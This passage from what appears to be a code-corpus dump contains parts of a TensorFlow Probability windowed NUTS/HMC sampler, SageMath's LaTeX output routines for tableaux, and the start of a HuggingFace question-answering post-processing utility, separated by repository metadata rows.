for state_part in initial_transformed_position])**-0.25
def _init_momentum(initial_transformed_position, *, batch_shape,
shard_axis_names):
"""Initialize momentum so trace_fn can be concatenated."""
variance_parts = [ps.ones_like(p) for p in initial_transformed_position]
return preconditioning_utils.make_momentum_distribution(
state_parts=initial_transformed_position,
batch_shape=batch_shape,
running_variance_parts=variance_parts,
shard_axis_names=shard_axis_names)
def windowed_adaptive_nuts(n_draws,
joint_dist,
*,
n_chains=64,
num_adaptation_steps=500,
current_state=None,
init_step_size=None,
dual_averaging_kwargs=None,
max_tree_depth=10,
max_energy_diff=500.,
unrolled_leapfrog_steps=1,
parallel_iterations=10,
trace_fn=default_nuts_trace_fn,
return_final_kernel_results=False,
discard_tuning=True,
chain_axis_names=None,
seed=None,
**pins):
"""Adapt and sample from a joint distribution using NUTS, conditioned on pins.
Step size is tuned using a dual-averaging adaptation, and the kernel is
conditioned using a diagonal mass matrix, which is estimated using expanding
windows.
Args:
n_draws: int
Number of draws after adaptation.
joint_dist: `tfd.JointDistribution`
A joint distribution to sample from.
n_chains: int or list of ints
Number of independent chains to run MCMC with.
num_adaptation_steps: int
Number of draws used to adapt step size and mass matrix.
current_state: Optional
Structure of tensors at which to initialize sampling. Should have the
same shape and structure as
`model.experimental_pin(**pins).sample(n_chains)`.
init_step_size: Optional
Where to initialize the step size for the leapfrog integrator. The
structure should broadcast with `current_state`. For example, if the
initial state is
```
{'a': tf.zeros(n_chains),
'b': tf.zeros([n_chains, n_features])}
```
then any of `1.`, `{'a': 1., 'b': 1.}`, or
`{'a': tf.ones(n_chains), 'b': tf.ones([n_chains, n_features])}` will
work. Defaults to the dimension of the log density to the 0.25 power.
dual_averaging_kwargs: Optional dict
Keyword arguments to pass to `tfp.mcmc.DualAveragingStepSizeAdaptation`.
By default, a `target_accept_prob` of 0.85 is set, acceptance
probabilities across chains are reduced using a harmonic mean, and the
class defaults are used otherwise.
max_tree_depth: Maximum depth of the tree implicitly built by NUTS. The
maximum number of leapfrog steps is bounded by `2**max_tree_depth` i.e.
the number of nodes in a binary tree `max_tree_depth` nodes deep. The
default setting of 10 takes up to 1024 leapfrog steps.
max_energy_diff: Scalar threshold of energy differences at each leapfrog,
divergence samples are defined as leapfrog steps that exceed this
threshold. Default to 1000.
unrolled_leapfrog_steps: The number of leapfrogs to unroll per tree
expansion step. Applies a direct linear multipler to the maximum
trajectory length implied by max_tree_depth. Defaults to 1.
parallel_iterations: The number of iterations allowed to run in parallel.
It must be a positive integer. See `tf.while_loop` for more details.
trace_fn: Optional callable
The trace function should accept the arguments
`(state, bijector, is_adapting, phmc_kernel_results)`, where the `state`
is an unconstrained, flattened float tensor, `bijector` is the
`tfb.Bijector` that is used for unconstraining and flattening,
`is_adapting` is a boolean to mark whether the draw is from an adaptation
step, and `phmc_kernel_results` is the
`UncalibratedPreconditionedHamiltonianMonteCarloKernelResults` from the
`PreconditionedHamiltonianMonteCarlo` kernel. Note that
`bijector.inverse(state)` will provide access to the current draw in the
untransformed space, using the structure of the provided `joint_dist`.
return_final_kernel_results: If `True`, then the final kernel results are
returned alongside the chain state and the trace specified by the
`trace_fn`.
discard_tuning: bool
Whether to return tuning traces and draws.
chain_axis_names: A `str` or list of `str`s indicating the named axes
by which multiple chains are sharded. See `tfp.experimental.mcmc.Sharded`
for more context.
seed: PRNG seed; see `tfp.random.sanitize_seed` for details.
**pins:
These are used to condition the provided joint distribution, and are
passed directly to `joint_dist.experimental_pin(**pins)`.
Returns:
A single structure of draws is returned in case the trace_fn is `None`, and
`return_final_kernel_results` is `False`. If there is a trace function,
the return value is a tuple, with the trace second. If the
`return_final_kernel_results` is `True`, the return value is a tuple of
length 3, with final kernel results returned last. If `discard_tuning` is
`True`, the tensors in `draws` and `trace` will have length `n_draws`,
otherwise, they will have length `n_draws + num_adaptation_steps`.
"""
if dual_averaging_kwargs is None:
dual_averaging_kwargs = {}
dual_averaging_kwargs = dict(dual_averaging_kwargs)
dual_averaging_kwargs.setdefault('target_accept_prob', 0.85)
proposal_kernel_kwargs = {
'step_size': init_step_size,
'max_tree_depth': max_tree_depth,
'max_energy_diff': max_energy_diff,
'unrolled_leapfrog_steps': unrolled_leapfrog_steps,
'parallel_iterations': parallel_iterations}
return _windowed_adaptive_impl(
n_draws=n_draws,
joint_dist=joint_dist,
kind='nuts',
n_chains=n_chains,
proposal_kernel_kwargs=proposal_kernel_kwargs,
current_state=current_state,
num_adaptation_steps=num_adaptation_steps,
dual_averaging_kwargs=dual_averaging_kwargs,
trace_fn=trace_fn,
return_final_kernel_results=return_final_kernel_results,
discard_tuning=discard_tuning,
chain_axis_names=chain_axis_names,
seed=seed,
**pins)
def windowed_adaptive_hmc(n_draws,
joint_dist,
*,
num_leapfrog_steps,
n_chains=64,
num_adaptation_steps=500,
current_state=None,
init_step_size=None,
dual_averaging_kwargs=None,
trace_fn=default_hmc_trace_fn,
return_final_kernel_results=False,
discard_tuning=True,
chain_axis_names=None,
seed=None,
**pins):
"""Adapt and sample from a joint distribution, conditioned on pins.
This uses Hamiltonian Monte Carlo to do the sampling. Step size is tuned using
a dual-averaging adaptation, and the kernel is conditioned using a diagonal
mass matrix, which is estimated using expanding windows.
Args:
n_draws: int
Number of draws after adaptation.
joint_dist: `tfd.JointDistribution`
A joint distribution to sample from.
num_leapfrog_steps: int
Number of leapfrog steps to use for the Hamiltonian Monte Carlo step.
n_chains: int or list of ints
Number of independent chains to run MCMC with.
num_adaptation_steps: int
Number of draws used to adapt step size and mass matrix.
current_state: Optional
Structure of tensors at which to initialize sampling. Should have the
same shape and structure as
`model.experimental_pin(**pins).sample(n_chains)`.
init_step_size: Optional
Where to initialize the step size for the leapfrog integrator. The
structure should broadcast with `current_state`. For example, if the
initial state is
```
{'a': tf.zeros(n_chains),
'b': tf.zeros([n_chains, n_features])}
```
then any of `1.`, `{'a': 1., 'b': 1.}`, or
`{'a': tf.ones(n_chains), 'b': tf.ones([n_chains, n_features])}` will
work. Defaults to the dimension of the log density to the 0.25 power.
dual_averaging_kwargs: Optional dict
Keyword arguments to pass to `tfp.mcmc.DualAveragingStepSizeAdaptation`.
By default, a `target_accept_prob` of 0.75 is set, acceptance
probabilities across chains are reduced using a harmonic mean, and the
class defaults are used otherwise.
trace_fn: Optional callable
The trace function should accept the arguments
`(state, bijector, is_adapting, phmc_kernel_results)`, where the `state`
is an unconstrained, flattened float tensor, `bijector` is the
`tfb.Bijector` that is used for unconstraining and flattening,
`is_adapting` is a boolean to mark whether the draw is from an adaptation
step, and `phmc_kernel_results` is the
`UncalibratedPreconditionedHamiltonianMonteCarloKernelResults` from the
`PreconditionedHamiltonianMonteCarlo` kernel. Note that
`bijector.inverse(state)` will provide access to the current draw in the
untransformed space, using the structure of the provided `joint_dist`.
return_final_kernel_results: If `True`, then the final kernel results are
returned alongside the chain state and the trace specified by the
`trace_fn`.
discard_tuning: bool
Whether to return tuning traces and draws.
chain_axis_names: A `str` or list of `str`s indicating the named axes
by which multiple chains are sharded. See `tfp.experimental.mcmc.Sharded`
for more context.
seed: PRNG seed; see `tfp.random.sanitize_seed` for details.
**pins:
These are used to condition the provided joint distribution, and are
passed directly to `joint_dist.experimental_pin(**pins)`.
Returns:
A single structure of draws is returned in case the trace_fn is `None`, and
`return_final_kernel_results` is `False`. If there is a trace function,
the return value is a tuple, with the trace second. If the
`return_final_kernel_results` is `True`, the return value is a tuple of
length 3, with final kernel results returned last. If `discard_tuning` is
`True`, the tensors in `draws` and `trace` will have length `n_draws`,
otherwise, they will have length `n_draws + num_adaptation_steps`.
"""
if dual_averaging_kwargs is None:
dual_averaging_kwargs = {}
dual_averaging_kwargs = dict(dual_averaging_kwargs)
dual_averaging_kwargs.setdefault('target_accept_prob', 0.75)
proposal_kernel_kwargs = {
'num_leapfrog_steps': num_leapfrog_steps,
'step_size': init_step_size,
'store_parameters_in_results': True}
return _windowed_adaptive_impl(
n_draws=n_draws,
joint_dist=joint_dist,
kind='hmc',
n_chains=n_chains,
proposal_kernel_kwargs=proposal_kernel_kwargs,
num_adaptation_steps=num_adaptation_steps,
current_state=current_state,
dual_averaging_kwargs=dual_averaging_kwargs,
trace_fn=trace_fn,
return_final_kernel_results=return_final_kernel_results,
discard_tuning=discard_tuning,
seed=seed,
chain_axis_names=chain_axis_names,
**pins)
def _windowed_adaptive_impl(n_draws,
joint_dist,
*,
kind,
n_chains,
proposal_kernel_kwargs,
num_adaptation_steps,
current_state,
dual_averaging_kwargs,
trace_fn,
return_final_kernel_results,
discard_tuning,
seed,
chain_axis_names,
**pins):
"""Runs windowed sampling using either HMC or NUTS as internal sampler."""
if trace_fn is None:
trace_fn = lambda *args: ()
no_trace = True
else:
no_trace = False
if isinstance(n_chains, int):
n_chains = [n_chains]
if (tf.executing_eagerly() or
not control_flow_util.GraphOrParentsInXlaContext(
tf1.get_default_graph())):
# A Tensor num_draws argument breaks XLA, which requires static TensorArray
# trace_fn result allocation sizes.
num_adaptation_steps = ps.convert_to_shape_tensor(num_adaptation_steps)
if 'num_adaptation_steps' in dual_averaging_kwargs:
warnings.warn('Dual averaging adaptation will use the value specified in'
' the `num_adaptation_steps` argument for its construction,'
' hence there is no need to specify it in the'
' `dual_averaging_kwargs` argument.')
# TODO(b/180011931): if num_adaptation_steps is small, this throws an error.
dual_averaging_kwargs['num_adaptation_steps'] = num_adaptation_steps
dual_averaging_kwargs.setdefault('reduce_fn',
generic_math.reduce_log_harmonic_mean_exp)
# By default, reduce over named axes for step size adaptation
dual_averaging_kwargs.setdefault('experimental_reduce_chain_axis_names',
chain_axis_names)
setup_seed, sample_seed = samplers.split_seed(
samplers.sanitize_seed(seed), n=2)
(target_log_prob_fn, initial_transformed_position, bijector,
step_broadcast, batch_shape, shard_axis_names) = _setup_mcmc(
joint_dist,
n_chains=n_chains,
init_position=current_state,
seed=setup_seed,
**pins)
if proposal_kernel_kwargs.get('step_size') is None:
if batch_shape.shape != (0,): # Scalar batch has a 0-vector shape.
raise ValueError('Batch target density must specify init_step_size. Got '
f'batch shape {batch_shape} from joint {joint_dist}.')
init_step_size = _get_step_size(initial_transformed_position,
target_log_prob_fn)
else:
init_step_size = step_broadcast(proposal_kernel_kwargs['step_size'])
proposal_kernel_kwargs.update({
'target_log_prob_fn': target_log_prob_fn,
'step_size': init_step_size,
'momentum_distribution': _init_momentum(
initial_transformed_position,
batch_shape=ps.concat([n_chains, batch_shape], axis=0),
shard_axis_names=shard_axis_names)})
initial_running_variance = [
sample_stats.RunningVariance.from_stats( # pylint: disable=g-complex-comprehension
num_samples=tf.zeros([], part.dtype),
mean=tf.zeros_like(part),
variance=tf.ones_like(part)) for part in initial_transformed_position
]
# TODO(phandu): Consider splitting out warmup and post warmup phases
# to avoid executing adaptation code during the post warmup phase.
ret = _do_sampling(
kind=kind,
proposal_kernel_kwargs=proposal_kernel_kwargs,
dual_averaging_kwargs=dual_averaging_kwargs,
num_draws=n_draws if discard_tuning else n_draws + num_adaptation_steps,
num_burnin_steps=num_adaptation_steps if discard_tuning else 0,
initial_position=initial_transformed_position,
initial_running_variance=initial_running_variance,
bijector=bijector,
trace_fn=trace_fn,
return_final_kernel_results=return_final_kernel_results,
chain_axis_names=chain_axis_names,
shard_axis_names=shard_axis_names,
seed=sample_seed)
if return_final_kernel_results:
draws, trace, fkr = ret
return sample.CheckpointableStatesAndTrace(
all_states=bijector.inverse(draws),
trace=trace,
final_kernel_results=fkr)
else:
draws, trace = ret
if no_trace:
return bijector.inverse(draws)
else:
return sample.StatesAndTrace(
all_states=bijector.inverse(draws), trace=trace)
| 42.45301
| 119
| 0.708479
|
505a3c1be35ff1ab9a1585eb9bb0cde57a5e0a30
| 12,464
|
py
|
Python
|
src/sage/combinat/output.py
|
bopopescu/sage
|
2d495be78e0bdc7a0a635454290b27bb4f5f70f0
|
[
"BSL-1.0"
] | 3
|
2019-07-15T13:48:24.000Z
|
2019-11-08T12:31:43.000Z
|
src/sage/combinat/output.py
|
bopopescu/sage
|
2d495be78e0bdc7a0a635454290b27bb4f5f70f0
|
[
"BSL-1.0"
] | 2
|
2018-10-30T13:40:20.000Z
|
2020-07-23T12:13:30.000Z
|
src/sage/combinat/output.py
|
bopopescu/sage
|
2d495be78e0bdc7a0a635454290b27bb4f5f70f0
|
[
"BSL-1.0"
] | 1
|
2019-06-02T03:16:55.000Z
|
2019-06-02T03:16:55.000Z
|
"""
Output functions
These are the output functions for latexing partitions and tableaux.
AUTHORS:
- Mike Hansen (?): initial version
- Andrew Mathas (2013-02-14): Added support for displaying conventions and
lines, and tableaux of skew partition, composition, and
skew/composition/partition/tableaux tuple shape.
"""
from __future__ import absolute_import, print_function
from six.moves import range
from string import Template
from sage.combinat.tableau import Tableaux
# The tex macro used to latex individual cells in an array (as a template).
# When using bar should be replaced by '|' or ''.
lr_macro = Template(r'\def\lr#1{\multicolumn{1}{$bar@{\hspace{.6ex}}c@{\hspace{.6ex}}$bar}{\raisebox{-.3ex}{$$#1$$}}}')
def tex_from_array(array, with_lines=True):
r"""
Return a latex string for a two dimensional array of partition, composition or skew composition shape
INPUT:
- ``array`` -- a list of list
- ``with_lines`` -- a boolean (default: ``True``)
Whether to draw a line to separate the entries in the array.
Empty rows are allowed; however, such rows should be given as
``[None]`` rather than ``[]``.
The array is drawn using either the English or French convention
following :meth:`Tableaux.options`.
.. SEEALSO:: :meth:`tex_from_array_tuple`
EXAMPLES::
sage: from sage.combinat.output import tex_from_array
sage: print(tex_from_array([[1,2,3],[4,5]]))
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[b]{*{3}c}\cline{1-3}
\lr{1}&\lr{2}&\lr{3}\\\cline{1-3}
\lr{4}&\lr{5}\\\cline{1-2}
\end{array}$}
}
sage: print(tex_from_array([[1,2,3],[4,5]], with_lines=False))
{\def\lr#1{\multicolumn{1}{@{\hspace{.6ex}}c@{\hspace{.6ex}}}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[b]{*{3}c}\\
\lr{1}&\lr{2}&\lr{3}\\
\lr{4}&\lr{5}\\
\end{array}$}
}
sage: print(tex_from_array([[1,2,3],[4,5,6,7],[8]]))
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[b]{*{4}c}\cline{1-3}
\lr{1}&\lr{2}&\lr{3}\\\cline{1-4}
\lr{4}&\lr{5}&\lr{6}&\lr{7}\\\cline{1-4}
\lr{8}\\\cline{1-1}
\end{array}$}
}
sage: print(tex_from_array([[1,2,3],[4,5,6,7],[8]], with_lines=False))
{\def\lr#1{\multicolumn{1}{@{\hspace{.6ex}}c@{\hspace{.6ex}}}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[b]{*{4}c}\\
\lr{1}&\lr{2}&\lr{3}\\
\lr{4}&\lr{5}&\lr{6}&\lr{7}\\
\lr{8}\\
\end{array}$}
}
sage: print(tex_from_array([[None,None,3],[None,5,6,7],[8]]))
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[b]{*{4}c}\cline{3-3}
&&\lr{3}\\\cline{2-4}
&\lr{5}&\lr{6}&\lr{7}\\\cline{1-4}
\lr{8}\\\cline{1-1}
\end{array}$}
}
sage: print(tex_from_array([[None,None,3],[None,5,6,7],[None,8]]))
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[b]{*{4}c}\cline{3-3}
&&\lr{3}\\\cline{2-4}
&\lr{5}&\lr{6}&\lr{7}\\\cline{2-4}
&\lr{8}\\\cline{2-2}
\end{array}$}
}
sage: print(tex_from_array([[None,None,3],[None,5,6,7],[8]], with_lines=False))
{\def\lr#1{\multicolumn{1}{@{\hspace{.6ex}}c@{\hspace{.6ex}}}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[b]{*{4}c}\\
&&\lr{3}\\
&\lr{5}&\lr{6}&\lr{7}\\
\lr{8}\\
\end{array}$}
}
sage: print(tex_from_array([[None,None,3],[None,5,6,7],[None,8]], with_lines=False))
{\def\lr#1{\multicolumn{1}{@{\hspace{.6ex}}c@{\hspace{.6ex}}}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[b]{*{4}c}\\
&&\lr{3}\\
&\lr{5}&\lr{6}&\lr{7}\\
&\lr{8}\\
\end{array}$}
}
sage: Tableaux.options.convention="french"
sage: print(tex_from_array([[1,2,3],[4,5]]))
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[t]{*{3}c}\cline{1-2}
\lr{4}&\lr{5}\\\cline{1-3}
\lr{1}&\lr{2}&\lr{3}\\\cline{1-3}
\end{array}$}
}
sage: print(tex_from_array([[1,2,3],[4,5]], with_lines=False))
{\def\lr#1{\multicolumn{1}{@{\hspace{.6ex}}c@{\hspace{.6ex}}}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[t]{*{3}c}\\
\lr{4}&\lr{5}\\
\lr{1}&\lr{2}&\lr{3}\\
\end{array}$}
}
sage: print(tex_from_array([[1,2,3],[4,5,6,7],[8]]))
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[t]{*{4}c}\cline{1-1}
\lr{8}\\\cline{1-4}
\lr{4}&\lr{5}&\lr{6}&\lr{7}\\\cline{1-4}
\lr{1}&\lr{2}&\lr{3}\\\cline{1-3}
\end{array}$}
}
sage: print(tex_from_array([[1,2,3],[4,5,6,7],[8]], with_lines=False))
{\def\lr#1{\multicolumn{1}{@{\hspace{.6ex}}c@{\hspace{.6ex}}}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[t]{*{4}c}\\
\lr{8}\\
\lr{4}&\lr{5}&\lr{6}&\lr{7}\\
\lr{1}&\lr{2}&\lr{3}\\
\end{array}$}
}
sage: print(tex_from_array([[None,None,3],[None,5,6,7],[8]]))
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[t]{*{4}c}\cline{1-1}
\lr{8}\\\cline{1-4}
&\lr{5}&\lr{6}&\lr{7}\\\cline{2-4}
&&\lr{3}\\\cline{3-3}
\end{array}$}
}
sage: print(tex_from_array([[None,None,3],[None,5,6,7],[None,8]]))
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[t]{*{4}c}\cline{2-2}
&\lr{8}\\\cline{2-4}
&\lr{5}&\lr{6}&\lr{7}\\\cline{2-4}
&&\lr{3}\\\cline{3-3}
\end{array}$}
}
sage: print(tex_from_array([[None,None,3],[None,5,6,7],[8]], with_lines=False))
{\def\lr#1{\multicolumn{1}{@{\hspace{.6ex}}c@{\hspace{.6ex}}}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[t]{*{4}c}\\
\lr{8}\\
&\lr{5}&\lr{6}&\lr{7}\\
&&\lr{3}\\
\end{array}$}
}
sage: print(tex_from_array([[None,None,3],[None,5,6,7],[None,8]], with_lines=False))
{\def\lr#1{\multicolumn{1}{@{\hspace{.6ex}}c@{\hspace{.6ex}}}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[t]{*{4}c}\\
&\lr{8}\\
&\lr{5}&\lr{6}&\lr{7}\\
&&\lr{3}\\
\end{array}$}
}
sage: Tableaux.options._reset()
"""
lr=lr_macro.substitute(bar='|' if with_lines else '')
if Tableaux.options.convention == "English":
return '{%s\n%s\n}' % (lr, tex_from_skew_array(array, with_lines))
else:
return '{%s\n%s\n}' % (lr, tex_from_skew_array(array[::-1], with_lines, align='t'))
def tex_from_array_tuple(a_tuple, with_lines=True):
r"""
Return a latex string for a tuple of two dimensional array of partition,
composition or skew composition shape.
INPUT:
- ``a_tuple`` -- a tuple of lists of lists
- ``with_lines`` -- a boolean (default: ``True``)
Whether to draw lines to separate the entries in the components of ``a_tuple``.
.. SEEALSO:: :meth:`tex_from_array` for the description of each array
EXAMPLES::
sage: from sage.combinat.output import tex_from_array_tuple
sage: print(tex_from_array_tuple([[[1,2,3],[4,5]],[],[[None,6,7],[None,8],[9]]]))
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[b]{*{3}c}\cline{1-3}
\lr{1}&\lr{2}&\lr{3}\\\cline{1-3}
\lr{4}&\lr{5}\\\cline{1-2}
\end{array}$},\emptyset,\raisebox{-.6ex}{$\begin{array}[b]{*{3}c}\cline{2-3}
&\lr{6}&\lr{7}\\\cline{2-3}
&\lr{8}\\\cline{1-2}
\lr{9}\\\cline{1-1}
\end{array}$}
}
sage: print(tex_from_array_tuple([[[1,2,3],[4,5]],[],[[None,6,7],[None,8],[9]]], with_lines=False))
{\def\lr#1{\multicolumn{1}{@{\hspace{.6ex}}c@{\hspace{.6ex}}}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[b]{*{3}c}\\
\lr{1}&\lr{2}&\lr{3}\\
\lr{4}&\lr{5}\\
\end{array}$},\emptyset,\raisebox{-.6ex}{$\begin{array}[b]{*{3}c}\\
&\lr{6}&\lr{7}\\
&\lr{8}\\
\lr{9}\\
\end{array}$}
}
sage: Tableaux.options.convention="french"
sage: print(tex_from_array_tuple([[[1,2,3],[4,5]],[],[[None,6,7],[None,8],[9]]]))
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[t]{*{3}c}\cline{1-2}
\lr{4}&\lr{5}\\\cline{1-3}
\lr{1}&\lr{2}&\lr{3}\\\cline{1-3}
\end{array}$},\emptyset,\raisebox{-.6ex}{$\begin{array}[t]{*{3}c}\cline{1-1}
\lr{9}\\\cline{1-2}
&\lr{8}\\\cline{2-3}
&\lr{6}&\lr{7}\\\cline{2-3}
\end{array}$}
}
sage: print(tex_from_array_tuple([[[1,2,3],[4,5]],[],[[None,6,7],[None,8],[9]]], with_lines=False))
{\def\lr#1{\multicolumn{1}{@{\hspace{.6ex}}c@{\hspace{.6ex}}}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[t]{*{3}c}\\
\lr{4}&\lr{5}\\
\lr{1}&\lr{2}&\lr{3}\\
\end{array}$},\emptyset,\raisebox{-.6ex}{$\begin{array}[t]{*{3}c}\\
\lr{9}\\
&\lr{8}\\
&\lr{6}&\lr{7}\\
\end{array}$}
}
"""
lr=lr_macro.substitute(bar='|' if with_lines else '')
if Tableaux.options.convention == "English":
return '{%s\n%s\n}' % (lr, ','.join(
r'\emptyset' if comp==[] else tex_from_skew_array(comp, with_lines) for comp in a_tuple))
else:
return '{%s\n%s\n}' % (lr, ','.join(
r'\emptyset' if comp==[] else tex_from_skew_array(comp[::-1], with_lines, align='t') for comp in a_tuple))
def tex_from_skew_array(array, with_lines=False, align='b'):
r"""
This function creates latex code for a "skew composition" ``array``.
That is, for a two dimensional array in which each row can begin with
an arbitrary number ``None``'s and the remaining entries could, in
principe, be anything but probably should be strings or integers of similar
width. A row consisting completely of ``None``'s is allowed.
INPUT:
- ``array`` -- The array
- ``with_lines`` -- (Default: ``False``) If ``True`` lines are drawn, if
``False`` they are not
- ``align`` -- (Default: ``'b'``) Determines the alignment on the latex
array environments
EXAMPLES::
sage: array=[[None, 2,3,4],[None,None],[5,6,7,8]]
sage: print(sage.combinat.output.tex_from_skew_array(array))
\raisebox{-.6ex}{$\begin{array}[b]{*{4}c}\\
&\lr{2}&\lr{3}&\lr{4}\\
&\\
\lr{5}&\lr{6}&\lr{7}&\lr{8}\\
\end{array}$}
"""
# first identify where the None's appear in ``array`` and define a
# function end_line which puts in the required \cline's.
if with_lines:
# last position of None in each row
nones=[1 if not None in row else 1+len(row)-row[::-1].index(None) for row in array]
def end_line(r):
# in a slightly unpythonic way, we label the lines as 0, 1, ..., len(array)
if r==0:
return r'\cline{%s-%s}'%(nones[0],len(array[0]))
elif r==len(array):
start=nones[r-1]
finish=len(array[r-1])
else:
start=min(nones[r], nones[r-1])
finish=max(len(array[r]), len(array[r-1]))
return r'\\' if start>finish else r'\\\cline{%s-%s}'%(start, finish)
else:
end_line=lambda r: r'\\'
# now we draw the array
tex=r'\raisebox{-.6ex}{$\begin{array}[%s]{*{%s}c}'%(align,max(map(len,array)))
tex+=end_line(0)+'\n'
for r in range(len(array)):
tex+='&'.join('' if c is None else r'\lr{%s}'%c for c in array[r])
tex+=end_line(r+1)+'\n'
return tex+r'\end{array}$}'
| 40.732026
| 119
| 0.518935
|
36d911b9e9acfb4d7670c457a12df0aa69c636dd
| 22,159
|
py
|
Python
|
examples/tensorflow/question-answering/utils_qa.py
|
MichalPitr/transformers
|
8b26688e2e4b68a64f4710b3627439089947cb08
|
[
"Apache-2.0"
] | 101
|
2021-12-22T00:03:51.000Z
|
2022-03-30T07:39:09.000Z
|
examples/tensorflow/question-answering/utils_qa.py
|
MichalPitr/transformers
|
8b26688e2e4b68a64f4710b3627439089947cb08
|
[
"Apache-2.0"
] | 5
|
2021-12-30T07:01:11.000Z
|
2022-03-28T01:56:04.000Z
|
examples/tensorflow/question-answering/utils_qa.py
|
MichalPitr/transformers
|
8b26688e2e4b68a64f4710b3627439089947cb08
|
[
"Apache-2.0"
] | 11
|
2021-12-30T06:18:04.000Z
|
2022-03-28T13:50:00.000Z
|
# coding=utf-8
# Copyright 2020 The HuggingFace Team All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Post-processing utilities for question answering.
"""
import collections
import json
import logging
import os
from typing import Optional, Tuple
import numpy as np
from tqdm.auto import tqdm
logger = logging.getLogger(__name__)
def postprocess_qa_predictions(
examples,
features,
predictions: Tuple[np.ndarray, np.ndarray],
version_2_with_negative: bool = False,
n_best_size: int = 20,
max_answer_length: int = 30,
null_score_diff_threshold: float = 0.0,
output_dir: Optional[str] = None,
prefix: Optional[str] = None,
):
"""
Post-processes the predictions of a question-answering model to convert them to answers that are substrings of the
original contexts. This is the base postprocessing functions for models that only return start and end logits.
Args:
examples: The non-preprocessed dataset (see the main script for more information).
features: The processed dataset (see the main script for more information).
predictions (:obj:`Tuple[np.ndarray, np.ndarray]`):
The predictions of the model: two arrays containing the start logits and the end logits respectively. Its
first dimension must match the number of elements of :obj:`features`.
version_2_with_negative (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not the underlying dataset contains examples with no answers.
n_best_size (:obj:`int`, `optional`, defaults to 20):
The total number of n-best predictions to generate when looking for an answer.
max_answer_length (:obj:`int`, `optional`, defaults to 30):
The maximum length of an answer that can be generated. This is needed because the start and end predictions
are not conditioned on one another.
null_score_diff_threshold (:obj:`float`, `optional`, defaults to 0):
The threshold used to select the null answer: if the best answer has a score that is less than the score of
the null answer minus this threshold, the null answer is selected for this example (note that the score of
the null answer for an example giving several features is the minimum of the scores for the null answer on
each feature: all features must be aligned on the fact they `want` to predict a null answer).
Only useful when :obj:`version_2_with_negative` is :obj:`True`.
output_dir (:obj:`str`, `optional`):
If provided, the dictionaries of predictions, n_best predictions (with their scores and logits) and, if
:obj:`version_2_with_negative=True`, the dictionary of the scores differences between best and null
answers, are saved in `output_dir`.
prefix (:obj:`str`, `optional`):
If provided, the dictionaries mentioned above are saved with `prefix` added to their names.
is_world_process_zero (:obj:`bool`, `optional`, defaults to :obj:`True`):
Whether this process is the main process or not (used to determine if logging/saves should be done).
"""
assert len(predictions) == 2, "`predictions` should be a tuple with two elements (start_logits, end_logits)."
all_start_logits, all_end_logits = predictions
assert len(predictions[0]) == len(features), f"Got {len(predictions[0])} predictions and {len(features)} features."
# Build a map example to its corresponding features.
example_id_to_index = {k: i for i, k in enumerate(examples["id"])}
features_per_example = collections.defaultdict(list)
for i, feature in enumerate(features):
features_per_example[example_id_to_index[feature["example_id"]]].append(i)
# The dictionaries we have to fill.
all_predictions = collections.OrderedDict()
all_nbest_json = collections.OrderedDict()
if version_2_with_negative:
scores_diff_json = collections.OrderedDict()
# Logging.
logger.info(f"Post-processing {len(examples)} example predictions split into {len(features)} features.")
# Let's loop over all the examples!
for example_index, example in enumerate(tqdm(examples)):
# Those are the indices of the features associated to the current example.
feature_indices = features_per_example[example_index]
min_null_prediction = None
prelim_predictions = []
# Looping through all the features associated to the current example.
for feature_index in feature_indices:
# We grab the predictions of the model for this feature.
start_logits = all_start_logits[feature_index]
end_logits = all_end_logits[feature_index]
# This is what will allow us to map some the positions in our logits to span of texts in the original
# context.
